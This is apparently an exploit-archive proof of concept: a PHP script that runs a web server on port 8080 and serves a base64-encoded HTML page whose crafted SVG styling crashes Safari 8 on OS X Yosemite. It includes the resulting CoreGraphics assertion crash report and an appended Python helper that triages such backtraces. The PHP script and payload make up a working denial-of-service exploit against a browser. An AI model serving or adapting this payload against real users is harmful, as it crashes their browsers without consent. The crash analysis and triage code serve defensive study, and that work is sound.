#!/usr/bin/php
<?php
# Title           : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of Concept
# Product Website : https://www.apple.com/safari/
# Author          : Mohammad Reza Espargham
# Linkedin        : https://ir.linkedin.com/in/rezasp
# E-Mail          : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website         : www.reza.es
# Twitter         : https://twitter.com/rezesp
# FaceBook        : https://www.facebook.com/mohammadreza.espargham
#
# Usage :
#   php poc.php
#   Open Safari and open ip:8080 / 127.0.0.1:8080
#   Crashed ;)

# Main POC Code

# Minimal HTTP server: a TCP listener on all interfaces, port 8080.
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, '0.0.0.0', 8080) or die('Failed to bind port 8080!');
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";

# Base64-encoded HTML page served to the browser. Decoded, it is a small
# document whose <svg> element gets "padding-top: 1394%" and
# "box-sizing: border-box" from a stylesheet and contains a single <polyline>.
$msg = 'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd = base64_decode($msg);

# Accept connections forever and answer every one with the same page.
for (;;) {
    if ($client = @socket_accept($reza)) {
        socket_write($client, "HTTP/1.1 200 OK\r\n" .
            "Content-Length: " . strlen($msgd) . "\r\n" .
            "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
            $msgd);
        # Close the client socket so the connection does not leak; the browser
        # already knows the body size from Content-Length.
        socket_close($client);
    } else {
        usleep(100000);
    }
}

# Crash Report
/*
Process Model: Multiple Web Processes

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib          0x00007fff8e628286 __pthread_kill + 10
1   libsystem_c.dylib               0x00007fff90619b53 abort + 129
2   libsystem_c.dylib               0x00007fff905e1c39 __assert_rtn + 321
3   com.apple.CoreGraphics          0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242
4   com.apple.CoreGraphics          0x00007fff8773aff0 CGContextAddPath + 93
5   com.apple.WebCore               0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6   com.apple.WebCore               0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
7   com.apple.WebCore               0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
8   com.apple.WebCore               0x000000010597f3c3 WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9   com.apple.WebCore               0x0000000104fa73cb WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 379
10  com.apple.WebCore               0x0000000104fa7062 WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 1330
11  com.apple.WebCore               0x0000000104f1ee72 WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 722
12  com.apple.WebCore               0x0000000105429e88 WebCore::InlineElementBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 312
13  com.apple.WebCore               0x0000000104ea4a63 WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14  com.apple.WebCore               0x0000000104ea4509 WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15  com.apple.WebCore               0x0000000104e53d96 WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*, WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16  com.apple.WebCore               0x0000000104e51373 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 67
17  com.apple.WebCore               0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
18  com.apple.WebCore               0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
19  com.apple.WebCore               0x00000001058db139 WebCore::RenderBlock::paintChild(WebCore::RenderBox&, WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 393
20  com.apple.WebCore               0x0000000104e51478 WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21  com.apple.WebCore               0x0000000104e51420 WebCore::RenderBlock::paintContents(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 240
22  com.apple.WebCore               0x0000000104e50724 WebCore::RenderBlock::paintObject(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 420
23  com.apple.WebCore               0x0000000104e529af WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint const&) + 287
24  com.apple.WebCore               0x0000000104e512b2 WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase, WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*) + 370
25  com.apple.WebCore               0x0000000104e50f87 WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*, WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int, WebCore::RenderObject*, bool, bool) + 423
26  com.apple.WebCore               0x0000000104e4fc30 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27  com.apple.WebCore               0x0000000104e4f002 WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28  com.apple.WebCore               0x0000000104e4fd62 WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29  com.apple.WebCore               0x0000000104e7ac36 WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned int, unsigned int) + 358
30  com.apple.WebCore               0x000000010593757f WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect const&) + 799
31  com.apple.WebCore               0x000000010537dd44 WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&, WebCore::FloatRect const&) + 132
32  com.apple.WebCore               0x00000001058b6ad9 WebCore::PlatformCALayer::drawLayerContents(CGContext*, WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul, WTF::CrashOnOverflow>&) + 361
33  com.apple.WebCore               0x0000000105b170a7 WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*, WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34  com.apple.WebCore               0x0000000105ba36cc -[WebSimpleLayer drawInContext:] + 172
35  com.apple.QuartzCore            0x00007fff8d7033c7 CABackingStoreUpdate_ + 3306
36  com.apple.QuartzCore            0x00007fff8d7026d7 ___ZN2CA5Layer8display_Ev_block_invoke + 59
37  com.apple.QuartzCore            0x00007fff8d702694 x_blame_allocations + 81
38  com.apple.QuartzCore            0x00007fff8d6f643c CA::Layer::display_() + 1546
39  com.apple.WebCore               0x0000000105ba35eb -[WebSimpleLayer display] + 43
40  com.apple.QuartzCore            0x00007fff8d6f47fd CA::Layer::display_if_needed(CA::Transaction*) + 603
41  com.apple.QuartzCore            0x00007fff8d6f3e81 CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42  com.apple.QuartzCore            0x00007fff8d6f3612 CA::Context::commit_transaction(CA::Transaction*) + 242
43  com.apple.QuartzCore            0x00007fff8d6f33ae CA::Transaction::commit() + 390
44  com.apple.QuartzCore            0x00007fff8d701f19 CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long, void*) + 71
45  com.apple.CoreFoundation        0x00007fff869f7127 __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46  com.apple.CoreFoundation        0x00007fff869f7080 __CFRunLoopDoObservers + 368
47  com.apple.CoreFoundation        0x00007fff869e8bf8 CFRunLoopRunSpecific + 328
48  com.apple.HIToolbox             0x00007fff8df1156f RunCurrentEventLoopInMode + 235
49  com.apple.HIToolbox             0x00007fff8df112ea ReceiveNextEventCommon + 431
50  com.apple.HIToolbox             0x00007fff8df1112b _BlockUntilNextEventMatchingListInModeWithFilter + 71
51  com.apple.AppKit                0x00007fff8ebe59bb _DPSNextEvent + 978
52  com.apple.AppKit                0x00007fff8ebe4f68 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53  com.apple.AppKit                0x00007fff8ebdabf3 -[NSApplication run] + 594
54  com.apple.AppKit                0x00007fff8eb57354 NSApplicationMain + 1832
55  libxpc.dylib                    0x00007fff8ab77958 _xpc_objc_main + 793
56  libxpc.dylib                    0x00007fff8ab79060 xpc_main + 490
57  com.apple.WebKit.WebContent     0x0000000103f10b40 0x103f10000 + 2880
58  libdyld.dylib                   0x00007fff873e45c9 start + 1
*/
?>
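The crash report above is the part of this PoC a defender actually works with: Thread 0 reaches `abort()` through `__assert_rtn`, i.e. an internal assertion in CoreGraphics (`CGPathCreateMutableCopyByTransformingPath`) failed while WebCore was painting an SVG shape, so the WebContent process terminated itself. The following triage helper is an added example and is not part of the PoC or of Apple's tooling: it parses Mac OS X crash-report backtrace lines, separates the termination frames from the frame that raised the assertion, finds where the browser engine first entered the call chain, and labels the crash as an assertion abort rather than a memory fault. The frame regex, the lists of "termination" symbols and system images, and the `SAMPLE_TRACE` (the first eight frames of the report above, reproduced as a constructed sample) are my assumptions.

```python
"""Crash-report triage helper (example code, not part of the PoC)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One backtrace frame of an OS X crash report, e.g.
#   "3   com.apple.CoreGraphics  0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242"
# (assumed format: index, image, address, symbol, "+", offset).
FRAME_RE = re.compile(
    r"^\s*(?P<index>\d+)\s+(?P<image>\S+)\s+(?P<addr>0x[0-9a-fA-F]+)\s+"
    r"(?P<symbol>.+?)\s+\+\s+(?P<offset>\d+)\s*$"
)

# Frames on the process-termination path rather than at the bug itself (assumed lists).
TERMINATION_SYMBOLS = {"__pthread_kill", "abort", "__assert_rtn", "raise"}
SYSTEM_IMAGES = {"libsystem_kernel.dylib", "libsystem_c.dylib", "libdyld.dylib", "libxpc.dylib"}

# Constructed sample: the first eight frames of Thread 0 from the crash report above.
SAMPLE_TRACE = """\
Process Model: Multiple Web Processes
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0   libsystem_kernel.dylib   0x00007fff8e628286 __pthread_kill + 10
1   libsystem_c.dylib        0x00007fff90619b53 abort + 129
2   libsystem_c.dylib        0x00007fff905e1c39 __assert_rtn + 321
3   com.apple.CoreGraphics   0x00007fff87716e4e CGPathCreateMutableCopyByTransformingPath + 242
4   com.apple.CoreGraphics   0x00007fff8773aff0 CGContextAddPath + 93
5   com.apple.WebCore        0x0000000104ea8c84 WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6   com.apple.WebCore        0x000000010597e851 WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) + 65
7   com.apple.WebCore        0x000000010597f08a WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&, WebCore::GraphicsContext*) + 122
"""


@dataclass
class Frame:
    index: int
    image: str
    address: int
    symbol: str
    offset: int


def parse_frames(report: str) -> List[Frame]:
    """Return every backtrace frame found in the report text, in stack order."""
    frames = []
    for line in report.splitlines():
        m = FRAME_RE.match(line)
        if m:
            frames.append(Frame(int(m["index"]), m["image"], int(m["addr"], 16),
                                m["symbol"], int(m["offset"])))
    return frames


def classify(frames: List[Frame]) -> Dict[str, object]:
    """Label the crash and locate the frames a triager cares about."""
    symbols = {f.symbol for f in frames}
    # abort() reached via __assert_rtn is a failed internal assertion: the process
    # killed itself on purpose. That is a denial-of-service signature, not by
    # itself evidence of memory corruption.
    if "__assert_rtn" in symbols and "abort" in symbols:
        kind = "assertion_abort"
    elif "abort" in symbols:
        kind = "abort"
    else:
        kind = "fault"
    # First frame outside the termination path: the code that raised the assertion.
    faulting: Optional[Frame] = next(
        (f for f in frames
         if f.symbol not in TERMINATION_SYMBOLS and f.image not in SYSTEM_IMAGES), None)
    # First frame owned by the browser engine: where untrusted page content was handled.
    engine: Optional[Frame] = next(
        (f for f in frames if f.image in ("com.apple.WebCore", "com.apple.WebKit")), None)
    svg = any("RenderSVG" in f.symbol for f in frames)
    return {"kind": kind, "faulting_frame": faulting, "engine_frame": engine,
            "svg_rendering": svg}


def summarize(report: str) -> str:
    """One-line triage summary suitable for a ticket or a log."""
    t = classify(parse_frames(report))
    parts = [f"kind={t['kind']}"]
    ff, ef = t["faulting_frame"], t["engine_frame"]
    if ff is not None:
        parts.append(f"faulting={ff.image}!{ff.symbol}+{ff.offset}")
    if ef is not None:
        parts.append(f"engine_entry={ef.symbol}")
    parts.append(f"svg_rendering={t['svg_rendering']}")
    return "; ".join(parts)


if __name__ == "__main__":
    print(summarize(SAMPLE_TRACE))
```

Run against the sample, the summary reports `kind=assertion_abort`, the CoreGraphics path-transform routine as the faulting frame, `fillPath` as the engine entry point and SVG rendering on the stack, which matches the report above and tells a triager this is a renderer crash (per-tab, since the process model is multiple web processes) to reproduce under a debugger before assuming anything beyond denial of service.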